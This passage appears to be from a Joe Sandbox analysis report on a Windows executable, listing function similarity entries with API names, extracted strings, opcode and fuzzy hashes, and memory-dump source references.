    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: Lockitstd::_$Lockit::_Lockit::~_$_invalid_parameter_noinfo_noreturn
    • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
    • API String ID: 533778753-2891247106
    • Opcode ID: 026989573ea27209ae04e441fa7fbb74c9798316c8c905b9363d05a5be5fd6f8
    • Instruction ID: d50a06c03b98cdb66913e99805616ccfe8cfbfd03f5e0affbe8605b2537962fd
    • Opcode Fuzzy Hash: 026989573ea27209ae04e441fa7fbb74c9798316c8c905b9363d05a5be5fd6f8
    • Instruction Fuzzy Hash: 6B42A332A08B4A86EB18EF69D4501BDB7A1FB45B98F884131DE4E13B6ADF3CD549C350
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: Lockitstd::_$_invalid_parameter_noinfo_noreturn$Lockit::_Lockit::~_$Wcsftime
    • String ID: !%x$%.0Lf$0123456789-
    • API String ID: 3423291586-778084515
    • Opcode ID: 34b021d4a9e562a6ed182eda517adbe2fc1294020da36c2c9d257be05d3169c2
    • Instruction ID: 8a92ce8a267219d1850e4ddc86c5012c982bb2b917913b6986e0fe7c5178a374
    • Opcode Fuzzy Hash: 34b021d4a9e562a6ed182eda517adbe2fc1294020da36c2c9d257be05d3169c2
    • Instruction Fuzzy Hash: 6A52C462F09B8589FB09EBA9D4503FCA771EB447A8F884232EE5D177A9DE78D045C310
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo
    • String ID:
    • API String ID: 3215553584-0
    • Opcode ID: f5388ea15350438e8a1582e3d0df842e881fc469dd08d470af3a11267d8be547
    • Instruction ID: 895e7e2bd5ba5f92c60600cc2b5534891de2899f39d4cc7923dd99b675c7b31f
    • Opcode Fuzzy Hash: f5388ea15350438e8a1582e3d0df842e881fc469dd08d470af3a11267d8be547
    • Instruction Fuzzy Hash: 83C1C026A0CB8655E768BF2D94413B9BAA0EB58B90F8D4131EE4E073F1DF7DE4548720
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
    • String ID:
    • API String ID: 2591520935-0
    • Opcode ID: f752fc2ad53d96a5a2cf0e4783939982821df30ecafcf97518e638cf9fd582f7
    • Instruction ID: f4a03fc1ae40c4b60b99e76fc1617344c7e4c515eaa1ca41268a157a4e88e9e8
    • Opcode Fuzzy Hash: f752fc2ad53d96a5a2cf0e4783939982821df30ecafcf97518e638cf9fd582f7
    • Instruction Fuzzy Hash: 31718923B14B9289FB58BF68D8527BCA3A0BF48744F984135CE1D576A5EF3DA845C320
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
    • String ID:
    • API String ID: 3140674995-0
    • Opcode ID: ca9133218e8fd64e453ca13e2065ac02271bf55d4d281d1e59191dc596debb9c
    • Instruction ID: a73e1da99255dcd3d9aa96117b79e0af4541666e1a588597fe17d7e5ea6b934b
    • Opcode Fuzzy Hash: ca9133218e8fd64e453ca13e2065ac02271bf55d4d281d1e59191dc596debb9c
    • Instruction Fuzzy Hash: F4315672604B8185EB649F64E8403FD7364FB44758F88443ADA4E57BA4EF7CD548C710
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo_noreturn
    • String ID: $$+xv$0123456789-
    • API String ID: 3668304517-2753741353
    • Opcode ID: 64dbe46abcd0a748f2301b1c3c723a728d35ddea38314b42eb9914c6443c78c9
    • Instruction ID: 31de79aebc75133fe761fc4378198a7c151808e49d990063bbe43800f445cf24
    • Opcode Fuzzy Hash: 64dbe46abcd0a748f2301b1c3c723a728d35ddea38314b42eb9914c6443c78c9
    • Instruction Fuzzy Hash: 22D2B266A09B4A89EB58AF1DD5502BCB760FB40B94F985031DE4D077B6CF3DD899C320
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
    • String ID:
    • API String ID: 1239891234-0
    • Opcode ID: 5f31ecb4f41bd0f4cf1f3f11288fb82f8ab5371129011550af17cd17c7e9598f
    • Instruction ID: ed31833d2f6688ba18960b3b3831b06c1b7da8356b319bbd20f2f1ddfde86058
    • Opcode Fuzzy Hash: 5f31ecb4f41bd0f4cf1f3f11288fb82f8ab5371129011550af17cd17c7e9598f
    • Instruction Fuzzy Hash: 6F314136608B8195DB64DF29E8403FEB3A4FB88754F980136EA9D43BA4EF3CD1558B10
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo_noreturn
    • String ID: $0123456789-
    • API String ID: 3668304517-700845222
    • Opcode ID: 93c310f1076dfa6572f971a1e162c11640b0d77122258c6e44ead9dc76e54eb7
    • Instruction ID: 90165bde5b6b10a0a007ebd6801a52770cdf31ff218430cfcd9c9a7f260bd869
    • Opcode Fuzzy Hash: 93c310f1076dfa6572f971a1e162c11640b0d77122258c6e44ead9dc76e54eb7
    • Instruction Fuzzy Hash: 9CD29266A09B4B95EB58AF19D4502BCB760FB44B84FA85032DE4E077B5CF3DD899C320
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: FindFullNamePath$CloseErrorFileFirstLast
    • String ID:
    • API String ID: 33141285-0
    • Opcode ID: 7624fc2163d9f08c92827ed3229528e3510a8d51733246aac2bf8c2a4a44af45
    • Instruction ID: 4d1c8254dbc6712968a328ad721eef80f6d23950f8748dca73811d697196d7b6
    • Opcode Fuzzy Hash: 7624fc2163d9f08c92827ed3229528e3510a8d51733246aac2bf8c2a4a44af45
    • Instruction Fuzzy Hash: C441A771A0874141EF54AB29A4643B9A2A0EF40BA4F9C0635DF6D077F9EF7CE4428728
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo_noreturn
    • String ID: %$+
    • API String ID: 3668304517-2626897407
    • Opcode ID: aaeac8550ca6e12506b71e98f6b98c11c6615126fb48153819423fe2f66e44ce
    • Instruction ID: 51715a7d47e25918694ed252af934773d592a86775aa7e40c4c286bea7fcd179
    • Opcode Fuzzy Hash: aaeac8550ca6e12506b71e98f6b98c11c6615126fb48153819423fe2f66e44ce
    • Instruction Fuzzy Hash: B6120423B1C7898AFB28DB68D4403FDA761EB55788F884131DE4D17AA9EE3CE545C720
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: memcpy_s
    • String ID:
    • API String ID: 1502251526-3916222277
    • Opcode ID: d5921c5f5581713e7daa7186113356940e2354a9cdd6fd7f83da389ac929e130
    • Instruction ID: 16037c78052937c49e5f53ae38dcc0704bb487e19367ebcc01ea950cd93e34c4
    • Opcode Fuzzy Hash: d5921c5f5581713e7daa7186113356940e2354a9cdd6fd7f83da389ac929e130
    • Instruction Fuzzy Hash: 09C1E472A1978687D728DF19E088A7AF7A1F794784F888135DB4E43794DB3EE841CB10
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID:
    • String ID: ", "d":"$", "id":"$", "uId":"$101${"n":"
    • API String ID: 0-3774563054
    • Opcode ID: 57c6288ed6cea57e80edcc7ecc00a2014172ac291a626356b348743fccb4a816
    • Instruction ID: 231cdbf37674592b9dab7416f73c1fdc43a7f5335664c52e772a626fb14fc86d
    • Opcode Fuzzy Hash: 57c6288ed6cea57e80edcc7ecc00a2014172ac291a626356b348743fccb4a816
    • Instruction Fuzzy Hash: C1A2E5A2E14B8585EB04DB78D4503FDA761EB817A8F948331EA6C07AE9DF78E0C1D314
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo_noreturn
    • String ID: ", "d":"$", "id":"$", "uId":"$101${"n":"
    • API String ID: 3668304517-3774563054
    • Opcode ID: 56646a04ab6d27d53349c6bcce1df289505333a279d7585462a6f8e37957097b
    • Instruction ID: df5ffdedeb17c92797809291a4315774b276aa7378a71910cf59bcfc4c4dc395
    • Opcode Fuzzy Hash: 56646a04ab6d27d53349c6bcce1df289505333a279d7585462a6f8e37957097b
    • Instruction Fuzzy Hash: 13A2E5A2E14B8585EB04DB78D4503FDA761EB857A8F948331EA6C07AE9DF78E0C1D314
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo_noreturn
    • String ID: ", "d":"$", "id":"$", "uId":"$101${"n":"
    • API String ID: 3668304517-3774563054
    • Opcode ID: bc839a47e9c3d447d13864ee055bf9ed074fe54e4d10fd2d2e6cd2155efeffd1
    • Instruction ID: 0122365bd99d95f3553841e37339c7ce72663f12dd155b195ea739afef9b2f26
    • Opcode Fuzzy Hash: bc839a47e9c3d447d13864ee055bf9ed074fe54e4d10fd2d2e6cd2155efeffd1
    • Instruction Fuzzy Hash: 89A2E5A2E14B8585EB04DB78D4503FDA761EB857A8F948331EA6C07AE9DF78E0C1D314
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo_noreturn
    • String ID: ", "d":"$", "id":"$", "uId":"$101${"n":"
    • API String ID: 3668304517-3774563054
    • Opcode ID: 02771d27ead677a9b0ed1525485d3142e06da71c14f12acb65310b75a26023e8
    • Instruction ID: d669a853706e8e414cd7f2870e968d9d9e780c0580c0b97eac25a363b603e1e1
    • Opcode Fuzzy Hash: 02771d27ead677a9b0ed1525485d3142e06da71c14f12acb65310b75a26023e8
    • Instruction Fuzzy Hash: E3A2E5A2E14B8585EB04DB78D4503FDA761EB857A8F948331EA6C07AE9DF78E0C1D314
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo_noreturn
    • String ID: ", "d":"$", "id":"$", "uId":"$101${"n":"
    • API String ID: 3668304517-3774563054
    • Opcode ID: 91c75f65d24afd891e359e78c223b4a5d7f9ed4280980d0461f2aa1c3b5be185
    • Instruction ID: 307583ad836702821eb722b533f011405e26f4bdcbb952e1dc081eadf24c69e8
    • Opcode Fuzzy Hash: 91c75f65d24afd891e359e78c223b4a5d7f9ed4280980d0461f2aa1c3b5be185
    • Instruction Fuzzy Hash: A2A2E5A2E14B8585EB04DB78D4503FDA761EB857A8F948331EA6C07AE9DF78E0C1D314
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo_noreturn
    • String ID: ", "d":"$", "id":"$", "uId":"$101${"n":"
    • API String ID: 3668304517-3774563054
    • Opcode ID: 0121a56c495bb3f6a1cc841da0f3e66fd35cafa0e229533a941ae2acd42fdd69
    • Instruction ID: d7a109cdbef977f639d7166c32fb5d4971ad9d74d38a1468d3ba940e322cb537
    • Opcode Fuzzy Hash: 0121a56c495bb3f6a1cc841da0f3e66fd35cafa0e229533a941ae2acd42fdd69
    • Instruction Fuzzy Hash: 16A2E5A2E14B8585EB04DB78D4503FDA761EB857A8F948331EA6C07AE9DF78E0C1D314
    APIs
    Strings
    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF75BD44B27
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: DebugDebuggerErrorLastOutputPresentString
    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
    • API String ID: 389471666-631824599
    • Opcode ID: 709f36ce9c18c584a5dd09b511388c37de8f709decbce0009373de8c9d67e20c
    • Instruction ID: eb308fbeea271a400a102868799d3e70ce69d3f5ae190bea3cfd94db77daaea5
    • Opcode Fuzzy Hash: 709f36ce9c18c584a5dd09b511388c37de8f709decbce0009373de8c9d67e20c
